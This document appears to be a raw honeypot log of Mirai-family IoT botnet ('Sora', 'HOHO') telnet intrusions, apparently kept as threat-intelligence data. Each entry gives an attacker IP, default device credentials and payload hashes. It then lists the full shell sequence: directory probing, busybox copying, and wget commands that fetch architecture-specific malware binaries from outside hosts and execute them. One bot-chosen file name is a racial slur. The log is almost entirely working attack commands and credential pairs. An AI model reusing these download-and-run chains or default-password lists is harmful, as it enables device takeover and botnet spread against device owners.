IP address User name Password SHA256 of the payload file
 80.211.239.144
root
ipcam_rt5350
1fedfee138d6da6f0218c6865602c0f1172db69ed24ddc70e42a953a0969592f
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf RICKIEMELTED dropper
/bin/busybox cp /bin/busybox RICKIEMELTED; >RICKIEMELTED; /bin/busybox chmod 777 RICKIEMELTED; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://80.211.239.144:80/bins/sora.mpsl -O - > RICKIEMELTED; /bin/busybox chmod 777 RICKIEMELTED; /bin/busybox SORA
./RICKIEMELTED telnet.loader.mpsl; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >RICKIEMELTED; /bin/busybox SORA
 188.166.56.145
root
12345
e3cb5213024a71c5558d1c7151f0a89428fc6862d4827a6dded0d5ee10599a07
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://185.22.153.43:80/bins/sora.m68k -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.m68k; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA
 80.211.239.144
default
OxhlwSG8
64d329bd9adad1f25740506fa31ececc08615e26670053bf0343ee4fb570da61
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf RICKIEMELTED dropper
/bin/busybox cp /bin/busybox RICKIEMELTED; >RICKIEMELTED; /bin/busybox chmod 777 RICKIEMELTED; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://80.211.239.144:80/bins/sora.arm -O - > RICKIEMELTED; /bin/busybox chmod 777 RICKIEMELTED; /bin/busybox SORA
./RICKIEMELTED telnet.loader.arm; /bin/busybox BIGREP
/bin/busybox rm -rf dropper RICKIEMELTED
/bin/busybox cp /bin/busybox RICKIEMELTED; >RICKIEMELTED; /bin/busybox chmod 777 RICKIEMELTED; /bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://80.211.239.144:80/bins/sora.arm7 -O - > RICKIEMELTED; /bin/busybox chmod 777 RICKIEMELTED; /bin/busybox SORA
./RICKIEMELTED telnet.loader.arm7; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >RICKIEMELTED; /bin/busybox SORA
 80.211.239.144
admin
changeme
1fedfee138d6da6f0218c6865602c0f1172db69ed24ddc70e42a953a0969592f
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf RICKIEMELTED dropper
/bin/busybox cp /bin/busybox RICKIEMELTED; >RICKIEMELTED; /bin/busybox chmod 777 RICKIEMELTED; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://80.211.239.144:80/bins/sora.mpsl -O - > RICKIEMELTED; /bin/busybox chmod 777 RICKIEMELTED; /bin/busybox SORA
./RICKIEMELTED telnet.loader.mpsl; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >RICKIEMELTED; /bin/busybox SORA
 142.93.28.248
root
7ujMko0admin
e3b4025a0662aaea0324ad5f9a72fa2764c88e6a0dcf3a849ebcff6b67ebc93d
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://142.93.28.248:80/bins/hoho.sh4 -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL selfrep; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO
 188.166.56.145
daemon
2011b37976ab1f54178b09322d94b53ad367aae9ea8a85d8585aae4154d568ca
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://185.22.153.43:80/bins/sora.sh4 -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.sh4; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA
 46.17.44.147
root
vizxv
ef187bb5e34a9df6a51197da527314124d2633ddc5493fb2713fe336ec4f6003
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://46.17.44.147:80/bins/sora.spc -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.spc; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA
 142.93.28.248
root
12345678
3ee00e864cf67021a05f289de9700381e3a7b2f8d99cd2d25bba166f6e5b6287
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://142.93.28.248:80/bins/hoho.mpsl -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL arm7.hoho; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO